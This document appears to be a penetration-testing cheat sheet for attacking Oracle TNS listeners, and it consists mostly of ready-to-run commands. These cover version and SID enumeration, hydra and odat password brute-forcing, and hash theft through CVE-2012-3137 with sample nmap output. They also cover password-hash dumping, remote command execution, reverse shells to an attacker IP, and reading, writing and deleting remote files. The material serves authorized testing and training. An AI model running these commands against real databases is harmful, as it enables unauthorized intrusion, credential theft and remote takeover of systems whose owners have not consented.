Oracle TNS

Pentesting Oracle TNS - TCP Ports 1521,1522-1529

Theory

Oracle clients communicate with the database using the Transparent Network Substrate (TNS) protocol. When the listener receives a connection request (1521/TCP, -you may also get secondary listeners on 1522–1529-), it starts up a new database process and establishes a connection between the client and the Oracle database.

Practice

Enumerate version

Using nmap scripts, we can enumerate the version of the TNS-Listener

nmap --script "oracle-tns-version" -p 1521 -T4 -sV <IP>

We can enumerate the TNS-Listener using the tool

tnscmd10g version -p 1521 -h <IP>

Commands & Brute-force

When enumerating Oracle the first step is to talk to the TNS-Listener

# Return the current status and variables used by the listener
tnscmd10g status -p 1521 -h <IP>

# Dump service data
tnscmd10g services -p 1521 -h <IP>

# Dump debugging information to the listener log
tnscmd10g debug -p 1521 -h <IP>

# Write the listener configuration file to a backup location
tnscmd10g save_config -p 1521 -h <IP>

If you receive an error, could be because TNS versions are incompatible (Use the --10G parameter with tnscmd10) and if the error persist, the listener may be password protected

We can use hydra to brute-force TNS-Listener password

hydra -P rockyou.txt -t 32 -s 1521 <IP> oracle-listener

Targeting SID

The SID (Service Identifier) is essentially the database name, depending on the install you may have one or more default SIDs, or even a totally custom dba defined SID.

#Using Hydra
hydra -L sid.txt -s 1521 <IP> oracle-sid

#Using odat
odatPLSEXTPROC sidguesser -s $SERVER -d $SID --sids-file=./sids.txt

# Interesting Wordilists
cat /usr/share/metasploit-framework/data/wordlists/sid.txt
cat /usr/share/nmap/nselib/data/oracle-sids

In some old versions (in 9 it works) we can enumerate the SID using tnscmd10g

#The SID are inside: SERVICE=(SERVICE_NAME=<SID_NAME>)
tnscmd10g status-p 1521 -h <IP>

Targeting Accounts

Once we have found a valid SID, the next step is account enumeration. From this point, you can connect to the listener and brute-force credentials.

#Odat
odat passwordguesser -s $SERVER -d $SID
odat passwordguesser -s $SERVER -d $SID -p 1521 --accounts-files users.txt pass.txt

#Hydra
hydra -L /tmp/user.txt -P /tmp/pass.txt -s 1521 $SERVER oracle /$SID

#Nmap
nmap --script oracle-brute -p 1521 --script-args oracle-brute.sid=$SID $SERVER

# User/Password list
cat /usr/share/nmap/nselib/data/oracle-default-accounts.lst

# User Password list
cat /usr/share/metasploit-framework/data/wordlists/oracle_default_userpass.txt

# User/Password list
cat /usr/share/oscanner/accounts.default

Stealremotepwds - CVE-2012-3137

The versions 11.1.0.6, 11.1.0.7, 11.2.0.1, 11.2.0.2, and 11.2.0.3 are vulnerable to this technique

Using nmap we can retreive intercept the initial traffic during authorization phase and extract a hash to bruteforce it offline:

root@kali:~# nmap -p1521 --script oracle-brute-stealth --script-args oracle-brute-stealth.sid=DB11g -n 10.11.21.30

Starting Nmap 6.49BETA4 (https://nmap.org) at 2016-03-02 14:58 EST
Nmap scan report for 10.11.21.30
PORT     STATE SERVICE
1521/tcp open  oracle
| oracle-brute-stealth:
|   Accounts
|     SYS:$o5logon$1245C95384E15E7F0C893FCD1893D8E19078170867E892CE86DF90880E09FAD3B4832CBCFDAC1
|     A821D2EA8E3D2209DB6*4202433F49DE9AE72AE2 - 
|     Hashed valid or invalid credentials
|   Statistics
|_    Performed 241 guesses in 12 seconds, average tps: 20

john hashes.txt

Also, we can use odat

# Test module
odat stealremotepwds -s <IP> -U <username> -P <password> -d <SID> --test-module

# Obtain the session key and salt for user list
odat stealremotepwds -s <IP> -U <username> -P <password> -d <SID> --get-all-passwords --user-list /usr/share/nmap/nselib/data/oracle-default-accounts.lst

Dump Oracle Hashes

Password hashes in Oracle are stored in the sys.users$ or dba_users tables. With permissions, we can extract them using odat

You may want to add the --sysdba to make it works

# Test the module before use it
odat passwordstealer -s <IP> -U <username> -P <password> -d <SID> --test-module

# Dump hashes
odat passwordstealer -s <IP> -U <username> -P <password> -d <SID> --get-passwords

# Dump hashes indirectly with CVE-2020-2984 for 12c or higher 
odat passwordstealer -s <IP> -U <username> -P <password> -d <SID> --get-passwords-ocm

# Dump hashes from history
odat passwordstealer -s <IP> -U <username> -P <password> -d <SID> --get-passwords-from-history

# Dump hashes with DBMS_STAT
odat passwordstealer -s <IP> -U <username> -P <password> -d <SID> --get-passwords-dbms-stats

Logging into a Remote Database

sqlplus <username>/<password>@<ip_address>:<port>/<SID>

If an account has system database priviledges (sysdba) or system operator (sysop) you may wish to try the following:

sqlplus <username>/<password>@<ip_address>/<SID> 'as sysdba'
sqlplus <username>/<password>@<ip_address>/<SID> 'as sysoper'

Remote Code Execution

If an account has system database priviledges (sysdba) or system operator (sysop) you may add following args when using odat:

--sysdba
--sysoper

# Execute commands
odat java -s <IP> -U <username> -P <password> -d <SID> --exec COMMAND

# Get a reverse shell
odat java -s <IP> -d <SID> -U <username> -P <password> --reverse-shell <ATTACKING_IP> <PORT>

# Execute commands
odat dbmsscheduler -s <IP> -d <SID> -U <username> -P <password> --exec "C:\windows\system32\cmd.exe /c echo 123&gt;&gt;C:\hacK"

# Get a reverse shell
odat dbmsscheduler -s <IP> -d <SID> -U <username> -P <password> --reverse-shell <ATTACKING_IP> <PORT>

odat externaltable -s <IP> -U <username> -P <password> -d <SID> --exec "C:/windows/system32" "calc.exe"

Read/Write files

#Read file
odat utlfile -s <IP> -d <SID> -U <username> -P <password> --getFile "C:/RemotePath" remote_file.txt local_file.txt

#Write file
odat utlfile -s <IP> -d <SID> -U <username> -P <password> --putFile "C:/RemotePath" remote_file.txt local_file.txt

#Remove file
odat utlfile -s <IP> -d <SID> -U <username> -P <password> --removeFile "C:/RemotePath" remote_file.txt

#Read file
odat externaltable -s <IP> -U <username> -P <password> -d <SID> --getFile "C:/RemotePath" remote_file.txt local_file.txt

OracleSQL Privilege Escalation

#Get module Help
odat privesc -s $SERVER -d $ID -U $USER -P $PASSWORD -h

Automation Tools

An interesting tool is oscanner, which will try to get some valid SID and then it will brute-force for valid credentials and try to extract some information:

#apt install oscanner
oscanner -s <IP> -P <PORT>

# Bruteforce SID and check all
odat all -s <IP> -p <PORT>

# Bruteforce accounts for that SID and check all
odat all -s <IP> -p <PORT> -d <SID>

# Check all for that acccount
odat all -s <IP> -p <PORT> -d <SID> -U <USER> -P <PASSWORD>

# Check all for that acccount as SYSDBA or SYSOPER
odat all -s <IP> -p <PORT> -d <SID> -U <USER> -P <PASSWORD> --sysdba
odat all -s <IP> -p <PORT> -d <SID> -U <USER> -P <PASSWORD> --sysoper

Resources

Last updated 5 months ago

Was this helpful?